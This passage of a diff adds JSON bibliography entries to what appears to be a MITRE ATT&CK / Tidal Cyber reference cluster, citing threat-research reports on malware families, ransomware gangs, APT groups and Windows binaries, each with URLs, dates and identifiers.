"352652a9-86c9-42e1-8ee0-968180c6a51e", + "value": "CheckPoint Bandook Nov 2020" + }, + { + "description": "Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.", + "meta": { + "date_accessed": "2017-11-18T00:00:00Z", + "refs": [ + "https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/" + ], + "source": "MITRE", + "title": "(Banker(GoogleChromeExtension)).targeting" + }, + "related": [], + "uuid": "93f37adc-d060-4b35-9a4d-62d2ad61cdf3", + "value": "Banker Google Chrome Extension Steals Creds" + }, + { + "description": "Or Chechik. (2022, October 31). Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2022-10-31T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n" + ], + "source": "MITRE", + "title": "Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure" + }, + "related": [], + "uuid": "411c3df4-08e6-518a-953d-19988b663dc4", + "value": "Unit42 Banking Trojans Hooking 2022" + }, + { + "description": "ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.", + "meta": { + "date_accessed": "2021-02-25T00:00:00Z", + "date_published": "2021-01-19T00:00:00Z", + "refs": [ + "https://wiki.archlinux.org/index.php/Bash#Invocation" + ], + "source": "MITRE", + "title": "Bash" + }, + "related": [], + "uuid": "06185cbd-6635-46c7-9783-67bd8742b66f", + "value": "Linux manual bash invocation" + }, + { + "description": "die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.", + "meta": { + "date_accessed": "2020-06-12T00:00:00Z", + "refs": [ + "https://linux.die.net/man/1/bash" + ], + "source": "MITRE", + "title": "bash(1) - Linux man page" + }, + "related": [], + "uuid": "c5b362ce-6bae-46f7-b047-e3a0b2bf2580", + "value": "DieNet Bash" + }, + { + "description": "LOLBAS. (2018, May 25). Bash.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Bash/" + ], + "source": "Tidal Cyber", + "title": "Bash.exe" + }, + "related": [], + "uuid": "7d3efbc7-6abf-4f3f-aec8-686100bb90ad", + "value": "Bash.exe - LOLBAS Project" + }, + { + "description": "LeFevre, A. (n.d.). Bashfuscator Command Obfuscators. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "refs": [ + "https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html" + ], + "source": "MITRE", + "title": "Bashfuscator Command Obfuscators" + }, + "related": [], + "uuid": "c0256889-3ff0-59de-b0d1-39a947a4c89d", + "value": "Bashfuscator Command Obfuscators" + }, + { + "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx" + ], + "source": "MITRE", + "title": "Basic TxF Concepts" + }, + "related": [], + "uuid": "72798536-a7e3-43e2-84e3-b5b8b54f0bca", + "value": "Microsoft Basic TxF Concepts" + }, + { + "description": "Bethany Hardin, Lavine Oluoch, Tatiana Vollbrecht. (2022, November 14). BATLOADER: The Evasive Downloader Malware. Retrieved June 5, 2023.", + "meta": { + "date_accessed": "2023-06-05T00:00:00Z", + "date_published": "2022-11-14T00:00:00Z", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html" + ], + "source": "MITRE", + "title": "BATLOADER: The Evasive Downloader Malware" + }, + "related": [], + "uuid": "53e12ade-99ed-51ee-b5c8-32180f144658", + "value": "BATLOADER: The Evasive Downloader Malware" + }, + { + "description": "Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.", + "meta": { + "date_accessed": "2016-08-19T00:00:00Z", + "date_published": "2015-12-22T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/" + ], + "source": "MITRE", + "title": "BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger" + }, + "related": [], + "uuid": "8c5d61ba-24c5-4f6c-a208-e0a5d23ebb49", + "value": "Palo Alto Networks BBSRAT" + }, + { + "description": "Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.", + "meta": { + "date_accessed": "2021-06-23T00:00:00Z", + "date_published": "2021-05-27T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit" + ], + "source": "MITRE", + "title": "bcdedit" + }, + "related": [], + "uuid": "40dedfcb-f666-4f2d-a518-5cd4ae2e273c", + "value": "Microsoft bcdedit 2021" + }, + { + "description": "Baumgartner, K. and Garnaeva, M.. (2014, November 3). BE2 custom plugins, router abuse, and target profiles. Retrieved March 24, 2016.", + "meta": { + "date_accessed": "2016-03-24T00:00:00Z", + "date_published": "2014-11-03T00:00:00Z", + "refs": [ + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" + ], + "source": "MITRE", + "title": "BE2 custom plugins, router abuse, and target profiles" + }, + "related": [], + "uuid": "c64696d0-ee42-41e5-92cb-13cf43fac0c9", + "value": "Securelist BlackEnergy Nov 2014" + }, + { + "description": "Baumgartner, K. and Garnaeva, M.. (2015, February 17). BE2 extraordinary plugins, Siemens targeting, dev fails. Retrieved March 24, 2016.", + "meta": { + "date_accessed": "2016-03-24T00:00:00Z", + "date_published": "2015-02-17T00:00:00Z", + "refs": [ + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/" + ], + "source": "MITRE", + "title": "BE2 extraordinary plugins, Siemens targeting, dev fails" + }, + "related": [], + "uuid": "ef043c07-6ae6-4cd2-82cf-7cbdb259f676", + "value": "Securelist BlackEnergy Feb 2015" + }, + { + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-06-15T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Bears in the Midst: Intrusion into the Democratic National Committee" + }, + "related": [], + "uuid": "7f4edc06-ac67-4d71-b39c-5df9ce521bbb", + "value": "Crowdstrike DNC June 2016" + }, + { + "description": "Vilkomir-Preisman, S. (2022, August 18). Beating Black Basta Ransomware. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2022-08-18T00:00:00Z", + "refs": [ + "https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence" + ], + "source": "MITRE", + "title": "Beating Black Basta Ransomware" + }, + "related": [], + "uuid": "72b64d7d-f8eb-54d3-83c8-a883906ceea1", + "value": "Deep Instinct Black Basta August 2022" + }, + { + "description": "Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.", + "meta": { + "date_accessed": "2019-09-13T00:00:00Z", + "date_published": "2019-01-01T00:00:00Z", + "refs": [ + "https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365" + ], + "source": "MITRE", + "title": "BECS and Beyond: Investigating and Defending O365" + }, + "related": [], + "uuid": "4866e6c3-c1b2-4131-bd8f-0ac228168a10", + "value": "Bienstock, D. - Defending O365 - 2019" + }, + { + "description": "Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "refs": [ + "https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf" + ], + "source": "MITRE", + "title": "before the United States Senate Select Committee on Intelligence" + }, + "related": [], + "uuid": "c40a3f96-75f4-4b1c-98a5-cb38129c6dc4", + "value": "Kevin Mandia Statement to US Senate Committee on Intelligence" + }, + { + "description": "Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. Retrieved March 20, 2018.", + "meta": { + "date_accessed": "2018-03-20T00:00:00Z", + "date_published": "2018-03-07T00:00:00Z", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/" + ], + "source": "MITRE", + "title": "Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign" + }, + "related": [], + "uuid": "85069317-2c25-448b-9ff4-504e429dc1bf", + "value": "Microsoft Dofoil 2018" + }, + { + "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.", + "meta": { + "date_accessed": "2018-06-11T00:00:00Z", + "date_published": "2017-06-12T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + ], + "source": "MITRE", + "title": "Behind the CARBANAK Backdoor" + }, + "related": [], + "uuid": "39105492-6044-460c-9dc9-3d4473ee862e", + "value": "FireEye CARBANAK June 2017" + }, + { + "description": "S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.", + "meta": { + "date_accessed": "2020-10-01T00:00:00Z", + "date_published": "2020-07-28T00:00:00Z", + "refs": [ + "https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/" + ], + "source": "MITRE", + "title": "Behind the scenes in the Expel SOC: Alert-to-fix in AWS" + }, + "related": [], + "uuid": "d538026c-da30-48d2-bc30-fde3776db1a8", + "value": "Expel Behind the Scenes" + }, + { + "description": "Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.", + "meta": { + "date_accessed": "2021-06-15T00:00:00Z", + "date_published": "2021-06-14T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/" + ], + "source": "MITRE", + "title": "Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign" + }, + "related": [], + "uuid": "1de8c853-2b0c-439b-a31b-a2c4fa9f4206", + "value": "Microsoft BEC Campaign" + }, + { + "description": "Harbison, M. (2021, February 9). BendyBear: Novel Chinese Shellcode Linked With Cyber Espionage Group BlackTech. Retrieved February 16, 2021.", + "meta": { + "date_accessed": "2021-02-16T00:00:00Z", + "date_published": "2021-02-09T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/" + ], + "source": "MITRE", + "title": "BendyBear: Novel Chinese Shellcode Linked With Cyber Espionage Group BlackTech" + }, + "related": [], + "uuid": "f5cbc08f-6f2c-4c81-9d68-07f61e16f138", + "value": "Unit42 BendyBear Feb 2021" + }, + { + "description": "Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2019-09-16T00:00:00Z", + "refs": [ + "https://cloud.google.com/storage/docs/best-practices" + ], + "source": "MITRE", + "title": "Best practices for Cloud Storage" + }, + "related": [], + "uuid": "752ad355-0f10-4c8d-bad8-42bf2fc75fa0", + "value": "Google Cloud Storage Best Practices, 2019" + }, + { + "description": "Johann Rehberger. (2020, September 23). Beware of the Shadowbunny - Using virtual machines to persist and evade detections. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2020-09-23T00:00:00Z", + "refs": [ + "https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/" + ], + "source": "MITRE", + "title": "Beware of the Shadowbunny - Using virtual machines to persist and evade detections" + }, + "related": [], + "uuid": "eef7cd8a-8cb6-4b24-ba49-9b17353d20b5", + "value": "Shadowbunny VM Defense Evasion" + }, + { + "description": "Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2014-04-16T00:00:00Z", + "refs": [ + "http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/" + ], + "source": "MITRE", + "title": "Beyond good ol’ Run key, Part 10" + }, + "related": [], + "uuid": "60d90852-ea00-404d-b613-9ad1589aff31", + "value": "Hexacorn Office Test" + }, + { + "description": "Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part 18. Retrieved November 15, 2019.", + "meta": { + "date_accessed": "2019-11-15T00:00:00Z", + "date_published": "2014-11-14T00:00:00Z", + "refs": [ + "http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/" + ], + "source": "MITRE", + "title": "Beyond good ol’ Run key, Part 18" + }, + "related": [], + "uuid": "bdcdfe9e-1f22-4472-9a86-faefcb5c5618", + "value": "Hexacorn Logon Scripts" + }, + { + "description": "Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2017-04-17T00:00:00Z", + "refs": [ + "http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/" + ], + "source": "MITRE", + "title": "Beyond good ol’ Run key, Part 62" + }, + "related": [], + "uuid": "7d558a35-a5c0-4e4c-92bf-cb2435c41a95", + "value": "Hexacorn Office Template Macros" + }, + { + "description": "LOLBAS. (2018, May 25). Bginfo.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/" + ], + "source": "Tidal Cyber", + "title": "Bginfo.exe" + }, + "related": [], + "uuid": "ca1eaac2-7449-4a76-bec2-9dc5971fd808", + "value": "Bginfo.exe - LOLBAS Project" + }, + { + "description": "Ben Armstrong, Lauren Pearce, Brad Pittack, Danny Quist. (2022, September 1). BianLian Ransomware Gang Gives It a Go!. Retrieved May 18, 2023.", + "meta": { + "date_accessed": "2023-05-18T00:00:00Z", + "date_published": "2022-09-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/" + ], + "source": "Tidal Cyber", + "title": "BianLian Ransomware Gang Gives It a Go!" + }, + "related": [], + "uuid": "fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d", + "value": "BianLian Ransomware Gang Gives It a Go! | [redacted]" + }, + { + "description": "Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.", + "meta": { + "date_accessed": "2021-08-26T00:00:00Z", + "date_published": "2021-06-10T00:00:00Z", + "refs": [ + "https://www.group-ib.com/blog/colunmtk-apt41/" + ], + "source": "MITRE", + "title": "Big airline heist APT41 likely behind a third-party attack on Air India" + }, + "related": [], + "uuid": "a2bf43a0-c7da-4cb9-8f9a-b34fac92b625", + "value": "Group IB APT 41 June 2021" + }, + { + "description": "Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2018-11-14T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware" + }, + "related": [], + "uuid": "0f85f611-90db-43ba-8b71-5d0d4ec8cdd5", + "value": "Crowdstrike Indrik November 2018" + }, + { + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "meta": { + "date_accessed": "2020-05-12T00:00:00Z", + "date_published": "2019-01-10T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware" + }, + "related": [], + "uuid": "df471757-2ce0-48a7-922f-a84c57704914", + "value": "CrowdStrike Ryuk January 2019" + }, + { + "description": "OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.", + "meta": { + "date_accessed": "2016-06-07T00:00:00Z", + "date_published": "2013-01-30T00:00:00Z", + "refs": [ + "https://www.owasp.org/index.php/Binary_planting" + ], + "source": "MITRE", + "title": "Binary planting" + }, + "related": [], + "uuid": "86fc5a62-385e-4c56-9812-138db0808fba", + "value": "OWASP Binary Planting" + }, + { + "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2016-12-26T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Binary-to-text_encoding" + ], + "source": "MITRE", + "title": "Binary-to-text encoding" + }, + "related": [], + "uuid": "9b3820e8-f094-4e87-9ed6-ab0207d509fb", + "value": "Wikipedia Binary-to-text Encoding" + }, + { + "description": "Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit in the Wild. Retrieved April 26, 2019.", + "meta": { + "date_accessed": "2019-04-26T00:00:00Z", + "date_published": "2015-08-02T00:00:00Z", + "refs": [ + "https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html" + ], + "source": "MITRE", + "title": "BIND9 – Denial of Service Exploit in the Wild" + }, + "related": [], + "uuid": "5e108782-2f32-4704-be01-055d9e767216", + "value": "Sucuri BIND9 August 2015" + }, + { + "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.", + "meta": { + "date_accessed": "2016-01-05T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/BIOS" + ], + "source": "MITRE", + "title": "BIOS" + }, + "related": [], + "uuid": "0c4a2cb3-d663-47ee-87af-c5e9e68fe15f", + "value": "Wikipedia BIOS" + }, + { + "description": "Ge, L. (2011, September 9). BIOS Threat is Showing up Again!. Retrieved November 14, 2014.", + "meta": { + "date_accessed": "2014-11-14T00:00:00Z", + "date_published": "2011-09-09T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/bios-threat-showing-again" + ], + "source": "MITRE", + "title": "BIOS Threat is Showing up Again!" + }, + "related": [], + "uuid": "dd6032fb-8913-4593-81b9-86d1239e01f4", + "value": "Ge 2011" + }, + { + "description": "Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.", + "meta": { + "date_accessed": "2022-01-26T00:00:00Z", + "date_published": "2020-03-05T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html" + ], + "source": "MITRE", + "title": "Bisonal: 10 years of play" + }, + "related": [], + "uuid": "eaecccff-e0a0-4fa0-81e5-799b23c26b5a", + "value": "Talos Bisonal Mar 2020" + }, + { + "description": "Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.", + "meta": { + "date_accessed": "2021-10-17T00:00:00Z", + "date_published": "2020-03-06T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html" + ], + "source": "MITRE", + "title": "Bisonal 10 Years of Play" + }, + "related": [], + "uuid": "6844e59b-d393-43df-9978-e3e3cc7b8db6", + "value": "Talos Bisonal 10 Years March 2020" + }, + { + "description": "Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.", + "meta": { + "date_accessed": "2018-08-07T00:00:00Z", + "date_published": "2018-07-31T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/" + ], + "source": "MITRE", + "title": "Bisonal Malware Used in Attacks Against Russia and South Korea" + }, + "related": [], + "uuid": "30b2ec12-b785-43fb-ab72-b37387046d15", + "value": "Unit 42 Bisonal July 2018" + }, + { + "description": "LOLBAS. (2018, May 25). Bitsadmin.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/" + ], + "source": "Tidal Cyber", + "title": "Bitsadmin.exe" + }, + "related": [], + "uuid": "89bdc17b-553c-4245-acde-f6c56602e357", + "value": "Bitsadmin.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.", + "meta": { + "date_accessed": "2018-01-12T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/aa362813.aspx" + ], + "source": "MITRE", + "title": "BITSAdmin Tool" + }, + "related": [], + "uuid": "5b8c2a8c-f01e-491a-aaf9-504ee7a1caed", + "value": "Microsoft BITSAdmin" + }, + { + "description": "Raghuprasad, C . (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "date_published": "2022-05-11T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html" + ], + "source": "MITRE", + "title": "Bitter APT adds Bangladesh to their targets" + }, + "related": [], + "uuid": "097583ed-03b0-41cd-bf85-66d473f46439", + "value": "Cisco Talos Bitter Bangladesh May 2022" + }, + { + "description": "Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "date_published": "2016-10-21T00:00:00Z", + "refs": [ + "https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan" + ], + "source": "MITRE", + "title": "BITTER: a targeted attack against Pakistan" + }, + "related": [], + "uuid": "9fc54fb0-b7d9-49dc-b6dd-ab4cb2cd34fa", + "value": "Forcepoint BITTER Pakistan Oct 2016" + }, + { + "description": "Camba, A. (2013, February 27). BKDR_RARSTONE: New RAT to Watch Out For. Retrieved January 8, 2016.", + "meta": { + "date_accessed": "2016-01-08T00:00:00Z", + "date_published": "2013-02-27T00:00:00Z", + "refs": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/" + ], + "source": "MITRE", + "title": "BKDR_RARSTONE: New RAT to Watch Out For" + }, + "related": [], + "uuid": "bca93846-457d-4644-ba43-f9293982916f", + "value": "Camba RARSTONE" + }, + { + "description": "Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.", + "meta": { + "date_accessed": "2019-06-05T00:00:00Z", + "date_published": "2013-06-15T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/BKDR_URSNIF.SM?_ga=2.129468940.1462021705.1559742358-1202584019.1549394279" + ], + "source": "MITRE", + "title": "BKDR_URSNIF.SM" + }, + "related": [], + "uuid": "aa791512-039e-4230-ab49-f184ca0e38c5", + "value": "TrendMicro BKDR_URSNIF.SM" + }, + { + "description": "Cybleinc. (2023, September 28). Bl00dy – New Ransomware Strain Active in the Wild. Retrieved August 3, 2023.", + "meta": { + "date_accessed": "2023-08-03T00:00:00Z", + "date_published": "2023-09-28T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://cyble.com/blog/bl00dy-new-ransomware-strain-active-in-the-wild/" + ], + "source": "Tidal Cyber", + "title": "Bl00dy – New Ransomware Strain Active in the Wild" + }, + "related": [], + "uuid": "ae2daa9c-6741-4ab7-854d-bee1170b3d7a", + "value": "Cyble September 28 2022" + }, + { + "description": "Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot, Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign. Retrieved January 11, 2024.", + "meta": { + "date_accessed": "2024-01-11T00:00:00Z", + "date_published": "2024-01-09T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html" + ], + "source": "Tidal Cyber", + "title": "Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign" + }, + "related": [], + "uuid": "dc7d882b-4e83-42da-8e2f-f557b675930a", + "value": "Trend Micro Pikabot January 9 2024" + }, + { + "description": "Check Point. (2022, October 20). BLACK BASTA AND THE UNNOTICED DELIVERY. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2022-10-20T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/" + ], + "source": "MITRE", + "title": "BLACK BASTA AND THE UNNOTICED DELIVERY" + }, + "related": [], + "uuid": "7a00457b-ae72-5aea-904f-9ca7f4cb9fe9", + "value": "Check Point Black Basta October 2022" + }, + { + "description": "Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.", + "meta": { + "date_accessed": "2023-03-14T00:00:00Z", + "date_published": "2022-11-03T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/" + ], + "source": "MITRE", + "title": "Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor" + }, + "related": [], + "uuid": "c7e55e37-d051-5111-8d0a-738656f88650", + "value": "BlackBasta" + }, + { + "description": "Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.", + "meta": { + "date_accessed": "2023-02-06T00:00:00Z", + "date_published": "2022-10-12T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html" + ], + "source": "MITRE", + "title": "Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike" + }, + "related": [], + "uuid": "6e4a1565-4a30-5a6b-961c-226a6f1967ae", + "value": "Trend Micro Black Basta October 2022" + }, + { + "description": "Sharma, S. and Hegde, N. (2022, June 7). Black basta Ransomware Goes Cross-Platform, Now Targets ESXi Systems. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2022-06-07T00:00:00Z", + "refs": [ + "https://www.uptycs.com/blog/black-basta-ransomware-goes-cross-platform-now-targets-esxi-systems" + ], + "source": "MITRE", + "title": "Black basta Ransomware Goes Cross-Platform, Now Targets ESXi Systems" + }, + "related": [], + "uuid": "a8145e38-c2a4-5021-824d-5a831299b9d9", + "value": "Uptycs Black Basta ESXi June 2022" + }, + { + "description": "Ballmer, D. (2022, May 6). Black Basta: Rebrand of Conti or Something New?. Retrieved March 7, 2023.", + "meta": { + "date_accessed": "2023-03-07T00:00:00Z", + "date_published": "2022-05-06T00:00:00Z", + "refs": [ + "https://blogs.blackberry.com/en/2022/05/black-basta-rebrand-of-conti-or-something-new" + ], + "source": "MITRE", + "title": "Black Basta: Rebrand of Conti or Something New?" + }, + "related": [], + "uuid": "32a272fe-ac10-5478-88a0-b3dd366ec540", + "value": "BlackBerry Black Basta May 2022" + }, + { + "description": "FBI. (2022, April 19). BlackCat/ALPHV Ransomware Indicators of Compromise. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "date_published": "2022-04-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.ic3.gov/Media/News/2022/220420.pdf" + ], + "source": "Tidal Cyber", + "title": "BlackCat/ALPHV Ransomware Indicators of Compromise" + }, + "related": [], + "uuid": "2640b58c-8413-4691-80e1-33aec9b6c7f6", + "value": "FBI BlackCat April 19 2022" + }, + { + "description": "IBM Security X-Force Team. (2023, May 30). BlackCat (ALPHV) ransomware levels up for stealth, speed and exfiltration. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "date_published": "2023-05-30T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/" + ], + "source": "Tidal Cyber", + "title": "BlackCat (ALPHV) ransomware levels up for stealth, speed and exfiltration" + }, + "related": [], + "uuid": "b80c1f70-9d05-4f4b-bdc2-6157c6837202", + "value": "X-Force BlackCat May 30 2023" + }, + { + "description": "BlackBerry. (n.d.). BlackCat Malware (AKA ALPHV). Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/blackcat" + ], + "source": "Tidal Cyber", + "title": "BlackCat Malware (AKA ALPHV)" + }, + "related": [], + "uuid": 